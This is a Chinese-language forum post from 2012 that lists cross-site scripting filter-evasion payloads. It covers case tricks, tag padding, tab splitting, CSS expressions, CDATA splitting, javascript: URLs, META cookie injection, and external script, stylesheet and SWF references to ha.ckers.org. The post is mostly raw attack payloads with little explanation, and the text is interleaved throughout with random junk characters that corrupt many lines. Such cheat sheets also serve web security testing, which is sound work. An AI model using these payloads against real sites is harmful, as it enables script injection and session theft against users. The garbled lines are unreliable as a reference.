1. 改变字符大小写: @8 D# a6 `& _0 e: G2 Q
- d0 e% X: [: R( S9 `
3 j5 w' g2 K3 u! {- m
; l; G! |# ~2 e( q <sCript>alert(‘d’)</scRipT>
1 s" F% I7 k2 n( r
8 y, |' y* [& Y% H5 N2. 利用多加一些其它字符来规避Regular Expression的检查
# G/ G* q) L+ k# w- S6 a1 c" J
9 t: O/ S7 e$ c9 `/ D <<script>alert(‘c’)//<</script>
0 a5 J5 M9 }" k+ P
9 G3 b$ h% T0 ^+ _2 c <SCRIPT a=">" SRC="t.js"></SCRIPT>5 V$ ~' T8 G. m
" }' x8 Q' C1 L0 p" A0 y <SCRIPT =">" SRC="t.js"></SCRIPT>
! j+ |& S% y- a8 G( F3 _% \
% {0 h4 C! L/ f0 C5 o) _/ R <SCRIPT a=">" ” SRC="t.js"></SCRIPT>! w5 g1 H- l n6 I, ?2 x
; U6 H' T6 }4 k: v" I+ V
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>* D. k" x% G& M1 o' s- Q/ K2 u
! ]9 U% ^8 t3 V$ ]8 P9 @4 O# @ s <SCRIPT a=`>` SRC="t.js"></SCRIPT>% N; i) a5 q# [1 W
, ~+ T5 S- b# J' V2 _
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>/ ~; h" f& \+ I- m0 A) m
8 ]2 J" H. x9 v3. 以其它扩展名取代.js% h! |/ W- G9 b" f/ y- m8 \
1 R* F) O& E1 w0 H <script src="bad.jpg"></script>
~- Z% `1 J, R" k+ r
5 E( n9 x a. e1 h G0 v& T6 F7 \4. 将Javascript写在CSS档里
4 ^) Q* P4 K( F# J3 k. x! {, N& P- U3 c) C4 D0 ]
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">2 u3 U, w6 z6 _8 g" F3 J% @& a
5 R& ]6 c4 F- ^9 ~2 [
example:
/ t e' I4 p$ n# g' o5 K' t
3 c9 J2 ~2 v1 ^8 R body {
; `( c/ a$ n9 D5 e$ J6 y! L/ v
& u. d; z# S4 |6 k2 o3 M% k/ x background-image: url(‘javascript:alert("XSS");’): r1 k$ ]6 r# V4 G. R' u7 C
! k6 b" F. }9 x3 F
}
! n" g# B8 I* L6 W
4 z9 K( d0 R' }- ^ w5 @5. 在script的tag里加入一些其它字符) `& c' U9 \; r7 Z; ^
& `# Z8 a. J1 w3 o1 a
<SCRIPT/SRC="t.js"></SCRIPT>
: d% r9 U2 o. U2 |& J5 `
+ N. O3 @: S' x* \! } <SCRIPT/anyword SRC="t.js"></SCRIPT>
) Y, j ]* ~% j( J- G* N7 D! J) L$ K' i u4 y" a3 m
6. 使用tab或是new line来规避9 K2 w) u# @4 r* \, F
* u! b6 D7 q1 ] o5 b( L4 f5 z <img src="jav ascr ipt:alert(‘XSS3′)">4 q @) M; P8 s; A0 j/ I$ p
- W, t3 c. X- b" E- y$ N
<img src="jav ascr ipt:alert(‘XSS3′)">
5 W j- B# d" y. Q' Q3 n: q
) S3 ~. v d) ?. T R <IMG SRC="jav ascript:alert(‘XSS’);">
1 b/ w4 s; f" H
! ^5 y: G0 W7 w' c/ ^; Y -> tag+ [! d0 l+ P" Z
7 r. d3 q4 ^$ U& D- s. K, r, Y6 y
-> new line) \8 x% Y0 J2 S1 y
: `% Q6 y* N3 c4 h( y) E! J! x
7. 使用"\"来规避1 y1 E( N9 `' P. D
w2 s& h1 ?* B( ~9 X
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>. s7 R `8 ]$ o2 w6 ~
, ]1 d; ]! g. X% p' @ <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>8 O8 h ?) w) j) k3 b- W+ G/ R
. x' s7 D) `2 y* K" Q6 }$ q <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
5 r& p6 t) X* m7 g1 e' o5 O
; ^) f$ L% f0 k( ?" a' W3 M: [" m; Q/ K1 K <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">3 y# \9 h1 r: m
7 v* S3 u' K: C0 t <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
$ V1 V5 R3 W& U! }# M, G8 u5 [
. G+ `0 L5 d- v; \- `8. 使用Hex encode来规避(也可能会把";"拿掉)
1 ]9 J( h, M" s. L" Q- h2 w
2 M1 `) r" k* o <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
( B- N' w* ^; u. J) c J/ j7 q% J3 s( R6 ~/ }( X/ {9 \' b2 j7 H
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">6 t6 F# Y9 R# d5 {" J* A
$ C" ]) g) o# a% a% _, L2 k+ \3 p
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">0 u+ \& Z4 H# u
5 ~5 U5 g5 l9 _1 G1 t# [
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">7 \- V0 @! b1 v1 |, z, C& U
( c" \ l5 ~. Y- N9. script in HTML tag
j8 [% i3 e$ ]6 j4 X2 A! u+ ?* M ] z4 V2 k% s
<body onload=」alert(‘onload’)」>
* R# |: ?% U: ]: s! W4 n% Z
1 N' m* E8 m8 K6 w N+ n7 E onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload, ?/ F0 j2 f* P. ]7 X+ P- `
! L; f$ d2 S# P) E9 R/ F
10. 在swf里含有xss的code
' o6 {2 }! K: [9 R
( L# Y6 { G% {+ t" Q <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
; H0 H& Y: D3 l+ v6 q$ l4 k2 W+ S$ {+ m$ R
11. 利用CDATA将xss的code拆开,再组合起来。8 q/ S: I3 X$ L3 U& O n
4 {( b! b2 \3 `
<XML ID=I><X><C>
" ~. H% u% s1 L. H( f I+ l! r3 o: k6 ]( B& I; F
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>4 A+ a; e. Q- q! u4 e
+ l& N# m% X# w4 j
</C></X>
: E1 ]4 ]& ?2 v+ `6 W* } {
8 f$ }% x7 O( p1 ?5 F </xml>
& ]) S& C: @6 q0 y, c" ?/ X) x& q1 u! D4 ^9 G- Y h# K5 k
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
, c1 m, B2 o" B% p- A+ r3 \: v) Z a9 b8 j% W6 I- D
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>. C$ M+ D# l& D, T5 z+ A
/ k% B3 Z% |6 G: l1 o0 |& o5 C
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
( [( l. R4 e8 A4 f+ Z5 p5 ]7 ]. L* z5 [1 j
12. 利用HTML+TIME。1 Z# h* u: T( l8 e- ~6 [$ }4 \
7 d6 u; B) o, C9 O <HTML><BODY>
, { C, K/ q) U. I6 q. g
, V2 o+ U, P' E) W: K' J) |+ L <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
" \: ^( h0 ^+ p4 ?* t7 D; J' y v" O0 }+ m4 n9 j) j
<?import namespace="t" implementation="#default#time2">6 c5 }( ^6 ]5 ^6 U/ {' _4 O
( a) x d4 w: i) Z4 m <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">, u- E2 z' W7 ~6 d/ }. N/ B
0 s+ _& ]$ O1 i. _+ d7 E
</BODY></HTML>2 e' j3 U( o7 ]. b# a; R5 G5 Z0 W
+ ^. s/ z' b* A4 Z1 V8 @13. 透过META写入Cookie。
: u, R& {8 l8 E: D8 z
5 n& f0 g% v$ H3 }* i9 v <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">$ e) [! L" S4 s1 a q3 @
% A- V& j4 j! T+ s' L* S
14. javascript in src , href , url
3 Q! o8 W+ B+ @+ u/ i" y$ e, e7 j }
<IFRAME SRC=javascript:alert(’13′)></IFRAME># A0 N1 O! h! B- f# ~: O) _0 y/ G
. D8 w# L! R3 N X <img src="javascript:alert(‘XSS3′)">2 @% X6 P+ h( l: \# J
2 I+ U: Q+ L& l<IMG DYNSRC="javascript:alert(‘XSS20′)">+ h# L2 C, C, f: N" W* x
; J' y8 ^0 R/ h, k0 R: K
<IMG LOWSRC="javascript:alert(‘XSS21′)">
* x: N3 ^& U. R8 I2 F$ o( u( ^9 M/ M/ _; z/ b4 E
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
: M+ s) J6 z( n0 `8 @, b. F6 M- [9 g% U$ M8 q6 t. h7 \
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
+ z) ^( B- q6 o1 K/ Z/ N; ^: o, R3 ], W
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">8 |/ r& w! ?: {& K$ l
& D% T, ]. ]( Z1 ^5 X/ P s <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">% n4 I" }5 ], P
2 F# {( e5 s" o- v) c <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
& V; Z8 O8 w2 U# z* K% q2 u( p( }& b
1 c/ G% m+ e+ a/ B0 V9 c </STYLE><A CLASS=XSS></A>
/ p1 U# i7 [# q T4 K% F
+ ]* R% K1 a2 o7 }2 ?% q8 T+ m8 Z <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET> u k9 b: M6 n) q( F, Y
9 Z3 r! `, r0 Y# O9 O
|
发表于 2012-12-31 09:59:28
收藏
支持
反对